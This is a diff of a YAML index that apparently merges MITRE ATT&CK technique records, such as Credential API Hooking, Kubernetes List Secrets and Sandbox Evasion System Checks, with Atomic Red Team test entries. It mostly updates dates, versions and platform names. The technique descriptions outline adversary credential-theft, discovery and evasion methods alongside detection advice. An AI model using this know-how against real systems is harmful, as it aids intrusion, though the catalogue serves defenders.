+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48421,81 +49146,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48508,28 +49162,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48586,9 +49306,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests:
     - name: List All Secrets
@@ -48677,7 +49396,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48701,8 +49420,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48767,12 +49484,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48831,7 +49547,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests:
     - name: Docker Container and Resource Discovery
@@ -48920,7 +49635,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48941,13 +49656,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48970,15 +49683,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -49004,13 +49716,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49035,12 +49746,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -49082,13 +49792,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49149,12 +49858,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49218,19 +49926,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -49277,7 +49984,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -49344,12 +50050,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -49439,18 +50144,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -49493,12 +50197,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49539,12 +50242,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49629,7 +50331,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49691,12 +50392,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49747,12 +50447,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49763,7 +50462,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49778,7 +50476,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49826,7 +50523,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49898,12 +50596,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49945,122 +50642,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
